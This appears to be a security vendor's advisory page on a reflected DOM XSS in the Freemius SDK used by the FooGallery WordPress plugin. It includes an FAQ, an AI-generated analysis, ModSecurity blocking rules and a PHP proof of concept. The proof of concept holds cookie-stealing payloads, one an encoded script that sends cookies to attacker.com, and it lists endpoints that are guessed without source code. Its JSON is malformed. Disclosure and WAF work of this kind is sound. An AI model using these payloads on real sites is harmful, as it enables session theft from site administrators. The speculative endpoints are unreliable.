What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability affecting the FooGallery plugin for WordPress, specifically versions up to 2.4.27. It allows unauthenticated attackers to inject arbitrary JavaScript into web pages via the ‘url’ parameter due to insufficient input sanitization.

How does the vulnerability work?

The vulnerability occurs when a malicious actor crafts a URL containing a JavaScript payload in the ‘url’ parameter. If a user clicks on this link while logged into the affected site, the injected script executes in their browser, potentially allowing the attacker to steal session cookies or perform actions on behalf of the user.

Who is affected by this vulnerability?

Any WordPress site using the FooGallery plugin version 2.4.27 or earlier with the Freemius SDK is vulnerable to CVE-2024-13362. Administrators should check their plugin versions and update if necessary.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the FooGallery plugin installed. If it is version 2.4.27 or earlier, your site is at risk. Additionally, review any security logs or reports for unusual activity related to URL parameters.

What is the CVSS score and what does it mean?

CVE-2024-13362 has a CVSS score of 6.1, classified as Medium severity. This indicates that while the vulnerability poses a risk, it requires user interaction to exploit, which somewhat mitigates the potential impact compared to higher severity vulnerabilities.

How can I fix or mitigate this vulnerability?

To mitigate this vulnerability, update the FooGallery plugin to version 2.4.29 or later, which contains the necessary security fixes. Additionally, implement input validation and output escaping for any user-controlled data in your applications.

What are the risks of exploitation?

If exploited, an attacker can execute arbitrary JavaScript in the context of the victim’s session, potentially allowing them to steal sensitive information or perform unauthorized actions. The risk is particularly high if an administrator is tricked into clicking the malicious link.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can craft a malicious URL that triggers the XSS vulnerability when visited by a victim. It shows specific payloads and endpoints that exploit the vulnerability, highlighting the ease of executing such attacks.

What should I do if I am unable to update the plugin immediately?

If immediate updates are not possible, consider implementing web application firewall (WAF) rules to block known XSS payloads in the ‘url’ parameter. Additionally, educate users about the risks of clicking unknown links.

Is this vulnerability limited to specific environments?

CVE-2024-13362 primarily affects WordPress sites using the FooGallery plugin with the Freemius SDK. However, any site that allows user input through URL parameters without proper sanitization could be at risk of similar attacks.

What are the common attack vectors for this vulnerability?

Common attack vectors include sending crafted links to logged-in users, particularly administrators or editors. Attackers may use social engineering techniques to encourage users to click on these links.

How can I stay informed about similar vulnerabilities?

To stay informed about vulnerabilities like CVE-2024-13362, regularly check security advisories from WordPress, follow security blogs, and subscribe to vulnerability databases. Implementing a routine security audit can also help identify and mitigate risks.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 4, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (foogallery)

CVE ID CVE-2024-13362

Plugin foogallery

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 2.4.27

Patched Version —

Disclosed April 29, 2026

Analysis Overview

“`json
{
“analysis”: “Atomic Edge analysis of CVE-2024-13362 (metadata-based): Multiple WordPress plugins and themes using a Freemius connector up to version 2.10.1 are vulnerable to reflected DOM-based cross-site scripting via the ‘url’ parameter. The vulnerability carries a CVSS score of 6.1 (Medium), with vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N. The affected plugin identified in the metadata is FooGallery (slug: foogallery) at version 2.4.27, with patched version 2.4.29.

Root Cause: The CWE-79 classification and description indicate improper neutralization of input during web page generation. This is a reflected DOM-based XSS vulnerability. Atomic Edge research infers that the vulnerable code likely exists in a JavaScript file bundled by the Freemius SDK that handles the ‘url’ parameter from the query string. The Freemius SDK often includes JavaScript that reads URL parameters and uses them in DOM manipulation without proper output escaping. Since no source code diff is available, this is an inference based on the CWE and the description mentioning the ‘url’ parameter specifically. The vulnerability does not require authentication (PR:N), meaning any unauthenticated visitor can be targeted.

Exploitation: An unauthenticated attacker crafts a malicious link containing a JavaScript payload in the ‘url’ parameter. The target URL points to an endpoint on a site running the vulnerable FooGallery plugin with the Freemius connector. Atomic Edge analysis suggests the vulnerable endpoint is likely the Freemius connector’s UI JavaScript file or dashboard page that reads window.location or URL parameters. The attacker sends the crafted link to a logged-in administrator or editor. If the victim clicks the link while authenticated, the injected script executes in the context of the victim’s session. The attack vector is user interaction (UI:R), requiring the victim to click the malicious link. The script can perform actions like stealing session cookies, modifying page content, or performing actions on behalf of the victim.

Remediation: The fix likely requires proper output escaping when the ‘url’ parameter value is written to the DOM. Based on the CWE, developers should use the appropriate escaping functions for the context where the parameter is used. For JavaScript context, this means using JavaScript string escaping or encoding functions. For HTML context, using HTML entity encoding. The Freemius SDK should validate the ‘url’ parameter against a whitelist of allowed origins or URL patterns before using it. Atomic Edge analysis recommends the Freemius team implement a server-side redirect validation that only permits redirects to trusted domains, and ensure client-side JavaScript escapes or sanitizes the parameter before DOM insertion.

Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s browser within the context of the vulnerable WordPress site. The CVSS impact values indicate low confidentiality and low integrity impact (C:L/I:L). An attacker could steal session tokens, perform actions on behalf of the victim (such as changing plugin settings or creating rogue admin users), or redirect users to malicious sites. Since the attack requires user interaction and the impact is limited to reflected XSS (not stored XSS), the severity is medium. However, if a site administrator is tricked, the attacker could gain administrative access to the WordPress installation.”,
poc_php”: “// Atomic Edge CVE Research – Proof of Concept (metadata-based)n// CVE-2024-13362 – Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameternn// This PoC demonstrates how an attacker would craft a malicious URL that triggers XSSn// when visited by a victim. The exact endpoint depends on the Freemius connector implementation.n// Based on Atomic Edge analysis, the most likely entry point is the Freemius SDK'sn// JavaScript-based redirect handler or account activation page.nn// Configurable target URL – change this to the vulnerable WordPress siten$target_url = 'http://example.com'; // Replace with actual target URLnn// The vulnerable parameter is 'url' – it is likely read client-side by Freemius JavaScriptn// that performs window.location manipulation or DOM updates without escaping.n// Common vulnerable paths include:n// – /wp-admin/admin.php?page=freemius-account&url=javascript:alert(1)n// – /wp-admin/admin-ajax.php?action=freemius_redirect&url=javascript:alert(1)n// – Direct link to Freemius SDK JS file that reads URL parametersnn// Craft the malicious URL with XSS payloadn// We use a common DOM-based XSS payload that executes when the 'url' parameter is written to the DOMn$xss_payload = 'javascript:alert(document.cookie)';n// Or use a more stealthy payload that exfiltrates datan$xss_payload = 'data:text/html;base64,PHNjcmlwdD5mZXRjaCgnaHR0cHM6Ly9hdHRhY2tlci5jb20vY29va2llPycgKyBkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+';nn// Build the exploit URLn// Based on Freemius common patterns, try the dashboard page firstn$exploit_url = $target_url . '/wp-admin/admin.php?page=freemius&url=' . urlencode($xss_payload);nnecho "[+] Atomic Edge Research – CVE-2024-13362 PoC\n";necho "[+] Vulnerable: Freemius SDK <= 2.10.1 (FooGallery <= 2.4.27)\n";necho "[+] Target: $target_url\n\n";necho "[+] Crafted Exploit URL:\n";necho $exploit_url . "\n\n";necho "[+] To test: Send this URL to an authenticated admin user.\n";necho "[+] If the XSS triggers, an alert box with cookies will appear (for the simple payload)\n";necho "[+] or the cookie will be sent to the attacker's server (for the exfiltration payload).\n\n";necho "[+] Alternate endpoints to try if the above doesn't work:\n";necho $target_url . "/wp-admin/admin.php?page=freemius-account&url=" . urlencode($xss_payload) . "\n";necho $target_url . "/wp-admin/admin-ajax.php?action=freemius_connect_url&url=" . urlencode($xss_payload) . "\n";nn// Note: This PoC does not verify if the target is vulnerable; it only generates the exploit URL.n// A real attacker would use a web browser to perform the click and observe the XSS execution.n// The exact endpoint should be confirmed by examining the Freemius SDK JavaScript files.n",
"modsecurity_rule": "# Atomic Edge WAF Rule – CVE-2024-13362 (metadata-based)n# Blocks reflected DOM-based XSS via the 'url' parameter in Freemius endpointsn# This rule targets the most common Freemius connector pages and AJAX handlersnn# Rule 1: Block XSS payloads in url parameter on Freemius admin pagesnSecRule REQUEST_URI "@rx ^/wp-admin/admin\.php$" \n "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Freemius DOM XSS via url parameter',severity:'CRITICAL',tag:'CVE-2024-13362'"n SecRule QUERY_STRING "@rx (?:^|&)url=(?:javascript|data|vbscript|onerror|onload|onclick|onmouseover|alert\()" "t:lowercase,t:urlDecode,chain"n SecRule ARGS:page "@rx ^freemius" "t:lowercase"nn# Rule 2: Block XSS payloads in url parameter on Freemius AJAX handlersnSecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \n "id:20261995,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Freemius AJAX DOM XSS via url parameter',severity:'CRITICAL',tag:'CVE-2024-13362'"n SecRule ARGS:action "@rx ^freemius_" "t:lowercase,chain"n SecRule ARGS:url "@rx (?:javascript|data|vbscript|onerror|onload|onclick|onmouseover|alert\()" "t:lowercase,t:urlDecode"nn# Rule 3: Block direct access to Freemius JS files with XSS payloads in urlnSecRule REQUEST_URI "@rx ^/wp-content/plugins/[^/]+/freemius/.*\.js$" \n "id:20261996,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Freemius JS file XSS via url',severity:'CRITICAL',tag:'CVE-2024-13362'"n SecRule QUERY_STRING "@rx (?:^|&)url=(?:javascript|data|vbscript|onerror|onload|onclick|onmouseover|alert\()" "t:lowercase,t:urlDecode""
}
“`

Frequently Asked Questions

What is CVE-2024-13362?
Overview of the vulnerability
CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability affecting the FooGallery plugin for WordPress, specifically versions up to 2.4.27. It allows unauthenticated attackers to inject arbitrary JavaScript into web pages via the ‘url’ parameter due to insufficient input sanitization.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability occurs when a malicious actor crafts a URL containing a JavaScript payload in the ‘url’ parameter. If a user clicks on this link while logged into the affected site, the injected script executes in their browser, potentially allowing the attacker to steal session cookies or perform actions on behalf of the user.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the FooGallery plugin version 2.4.27 or earlier with the Freemius SDK is vulnerable to CVE-2024-13362. Administrators should check their plugin versions and update if necessary.
How can I check if my site is vulnerable?
Steps for verification
To determine if your site is vulnerable, check the version of the FooGallery plugin installed. If it is version 2.4.27 or earlier, your site is at risk. Additionally, review any security logs or reports for unusual activity related to URL parameters.
What is the CVSS score and what does it mean?
Understanding the severity rating
CVE-2024-13362 has a CVSS score of 6.1, classified as Medium severity. This indicates that while the vulnerability poses a risk, it requires user interaction to exploit, which somewhat mitigates the potential impact compared to higher severity vulnerabilities.
How can I fix or mitigate this vulnerability?
Recommended actions
To mitigate this vulnerability, update the FooGallery plugin to version 2.4.29 or later, which contains the necessary security fixes. Additionally, implement input validation and output escaping for any user-controlled data in your applications.
What are the risks of exploitation?
Potential impacts of the vulnerability
If exploited, an attacker can execute arbitrary JavaScript in the context of the victim’s session, potentially allowing them to steal sensitive information or perform unauthorized actions. The risk is particularly high if an administrator is tricked into clicking the malicious link.
What does the proof of concept demonstrate?
Understanding the exploit
The proof of concept illustrates how an attacker can craft a malicious URL that triggers the XSS vulnerability when visited by a victim. It shows specific payloads and endpoints that exploit the vulnerability, highlighting the ease of executing such attacks.
What should I do if I am unable to update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider implementing web application firewall (WAF) rules to block known XSS payloads in the ‘url’ parameter. Additionally, educate users about the risks of clicking unknown links.
Is this vulnerability limited to specific environments?
Scope of the vulnerability
CVE-2024-13362 primarily affects WordPress sites using the FooGallery plugin with the Freemius SDK. However, any site that allows user input through URL parameters without proper sanitization could be at risk of similar attacks.
What are the common attack vectors for this vulnerability?
Identifying exploitation methods
Common attack vectors include sending crafted links to logged-in users, particularly administrators or editors. Attackers may use social engineering techniques to encourage users to click on these links.
How can I stay informed about similar vulnerabilities?
Best practices for security awareness
To stay informed about vulnerabilities like CVE-2024-13362, regularly check security advisories from WordPress, follow security blogs, and subscribe to vulnerability databases. Implementing a routine security audit can also help identify and mitigate risks.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations